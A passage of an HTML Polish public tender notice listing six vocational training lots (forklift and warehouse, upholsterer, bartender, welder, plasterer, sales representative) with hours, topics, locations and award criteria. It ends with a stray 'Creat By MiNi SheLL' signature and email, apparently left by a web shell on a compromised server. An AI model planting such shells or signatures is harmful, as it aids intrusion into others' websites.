<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia obejmuje zagadnienia potrzebne   do uzyskania uprawnień obsługi  urządzeń transportu bliskiego; uczestnicy poznają zasady magazynowania oraz obsługi kasy z czytnikiem kodów. Szkolenie będzie trwało 150 godzin, w tym 60 godzin zajęć teoretycznych i 90 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy   45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
typy stosowanych wózków jezdniowych, 
budowa wózka,
czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami, 
czynności operatora w czasie pracy z wózkami,
wiadomości z zakresu ładunkoznawstwa, 
wiadomości z zakresu BHP, 
wiadomości o dozorze technicznym, 
obsługa kasy fiskalnej z czytnikiem kodów,
gospodarka magazynowa.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia oraz Zaświadczenie kwalifikacyjne Urzędu Dozoru Technicznego.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Inowrocławiu, ul. Cegielna 14/16. Zajęcia praktyczne muszą odbyć się na terenie Inowrocławia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs szwacz - tapicer dla 10 osób w Inowrocławiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje informacje z zakresu: podstawowych przepisów bhp i ergonomii  pracy w zakresie obszaru zawodowego, zastosowania  rysunku  technicznego, wiadomości z maszynoznawstwa - zasad stosowania narzędzi i maszyn  niezbędnych w tapicerstwie, materiałoznawstwa  - zasad stosowania materiałów niezbędnych w tapicerstwie, zasad oszczędzania materiałów, energii i urządzeń. Szkolenie będzie trwało 150 godzin, w tym 60 godzin zajęć teoretycznych i 90 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
podstawowe przepisy  bhp i ergonomii  pracy w zakresie obszaru zawodowego,
technologia,
zastosowanie  rysunku  technicznego,
maszynoznawstwo - zasady stosowania narzędzi i maszyn  niezbędnych w pracy szwacza-tapicera, 
materiałoznawstwo  - zasady stosowania materiałów niezbędnych w pracy szwacza-tapicera, 
zasady oszczędzania materiałów, energii i urządzeń.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Inowrocławiu, ul. Cegielna 14/16. Zajęcia praktyczne muszą odbyć się na terenie Inowrocławia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs kelner - barman dla 10 osób w Świeciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem tego kursu jest przygotowanie uczestników kursu do pracy  na stanowisku kelner - barman. Szkolenie będzie trwało 65 godzin, w tym 50 godzin zajęć teoretycznych i 15 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
historia napojów mieszanych,
sprzęt, wyposażenie i aranżacja baru,
sylwetka barmana,
etyka zawodowa,
obsługa konsumenta,
elementy psychologii i typologia klienta,
towaroznawstwo i miksologia napojów,
ocena jakości napojów,
technika miksowania napojów,
elementy rachunkowości i system rozliczeń,
estetyka i aranżacja baru,
obsługa imprez okolicznościowych,
profesjonalna obsługa klienta.
Zajęcia praktyczne muszą zostać przeprowadzone w lokalnej restauracji  lub klubie.
Kurs kończy się egzaminem i uzyskaniem zaświadczenia o jego ukończeniu.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Świeciu, ul. Chmielniki 2B. Zajęcia praktyczne muszą odbyć się na terenie Świecia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs spawacz metodą MAG/TIG dla 10 osób w Świeciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia obejmuje zagadnienia, po których przyswojeniu uczestnik kursu uzyskuje uprawnienia do wykonywania spoin pachwinowych blach i rur ze stali ferrytycznych metodą MAG i TIG. Szkolenie będzie trwało 220 godzin, w tym 30 godzin zajęć teoretycznych i 190 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
Poznanie procesów spawania i materiałów spawalniczych,
Poznanie urządzeń do spawania i technik spawania,
Przygotowanie materiału do spawania.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Świadectwo Egzaminu Spawacza oraz książeczkę Spawacza Instytutu Spawalnictwa w Gliwicach.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Świeciu, ul. Chmielniki 2B. Zajęcia praktyczne muszą odbyć się na terenie Świecia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs pracownika robót wykończeniowych szpachlarz dla 10 osób we Włocławku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie z zakresu przygotowywania, wygładzania i wykańczania obrabianych powierzchni metodą szpachlowania, usuwania starych powłok malarskich i nierówności, sprawdzenia przyczepności, wzmocnienia i wyrównywania chłonności podłoża (gruntowania), uzupełniania ubytków i pęknięć, montażu listew narożnikowych, szpachlowania warstwą wyrównującą, szpachlowania warstwą wygładzającą i szlifowania powierzchni. Dodatkowo uczestnik pozna elementy pracy z grupy klasyfikacji zawodów - robotnik budowlany robót wykończeniowych i pokrewnych. Szkolenie będzie trwało 168 godzin, w tym 30 godzin zajęć teoretycznych i 138 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
zasady i przepisy BHP, ochrony ppoż., ergonomii, ochrony środowiska w zakresie przygotowania powierzchni do szpachlowania;
omówienie rodzajów tynków;
omówienie dokumentacji technicznej w zakresie rozpoznawania powierzchni do szpachlowania;
omówienie metod sprawdzania przyczepności powierzchni;
omówienie rodzajów materiałów odtłuszczających;
omówienie rodzajów materiałów wypełniających;
omówienie rodzajów materiałów do wzmacniania, wyrównania chłonności podłoża, zwiększania przyczepności (materiały do gruntowania);
omówienie rodzajów materiałów do likwidowania rys, pęknięć;
omówienie metod przygotowania powierzchni do szpachlowania; 
instrukcje obsługi narzędzi i maszyn wykorzystywanych do przygotowania ścian do szpachlowania;	
omówienie sposobów przechowywania narzędzi i maszyn.
Część praktyczna szkolenia (roboty wykończeniowe, szpachlowanie) musi uwzględniać:
praktyczna nauka posługiwanie się instrukcjami i dokumentacją technologiczną; 
praktyczna nauka doboru rodzajów tynków, usuwania uszkodzeń i wad powłok szpachlerskich; 
praktyczna nauka oczyszczania powierzchni do szpachlowania;
praktyczna nauka wzmacniania, wyrównywania chłonności podłoża, zwiększania przyczepności powierzchni (gruntowanie);
praktyczna nauka przygotowywania materiałów wypełniających do nałożenia na powierzchniach;
praktyczna nauka przygotowywania powierzchni do szpachlowania;
praktyczna nauka dobierania narzędzi do szpachlowania, materiałów do wyrównania i gładzenia ścian, sporządzania zaprawy;
praktyczna nauka szpachlowania ścian;
praktyczna nauka szlifowania szpachlowanych powierzchni;
praktyczna nauka oceniania jakości powierzchni po szpachlowaniu; 
praktyczna nauka obsługi maszyn i narzędzi związanych ze szpachlowaniem.
praktyczna nauka elementy pracy z grupy klasyfikacji zawodów - robotnik budowlany robót wykończeniowych i pokrewnych.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia oraz Certyfikat uprawniający do wykonywania zawodu pracownika robót wykończeniowych szpachlarza.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego we Włocławku, ul. Plac Wolności 17. Zajęcia praktyczne muszą odbyć się na terenie Włocławka, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs przedstawiciela handlowego dla 10 osób we Włocławku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie to przygotowuje teoretycznie i praktycznie do pracy w zawodzie przedstawiciela handlowego. Szkolenie będzie trwało 150 godzin, w tym 30 godzin zajęć teoretycznych i 120 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
zasady i przepisy Bezpieczeństwa i Higieny Pracy;
omówienie technik sprzedaży;
omówienie wybranych zagadnień z prawnej ochrony rynku i konsumenta;
omówienie Korespondencji handlowej;
omówienie towaroznawstwa;
omówienie podstaw komunikacji;
omówienie zasad marketingowych;
omówienie etyki zawodu.
Część praktyczna szkolenia musi uwzględniać:	
praktyczne przygotowanie uczestnika do zawodu przedstawiciela handlowego;
praktyczne usystematyzowanie wiedzy na temat roli przedstawiciela handlowego;
praktyczne poznanie metod oraz technik przydatnych w planowaniu sprzedaży;
praktyczne zapoznanie się ze standardowymi krokami wymiany handlowej;
praktyczne przetrenowanie perswazyjnego formatu prezentacji produktu;
praktyczne rozpoznawanie typów klienta;
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma zaświadczenie potwierdzające ukończenie szkolenia oraz Certyfikat uprawniający do wykonywania zawodu przedstawiciela handlowego.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego we Włocławku, ul. Plac Wolności 17. Zajęcia praktyczne muszą odbyć się na terenie Włocławka, a Wykonawca zobowiązany jest do zapewnienia sali szkoleniowej we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com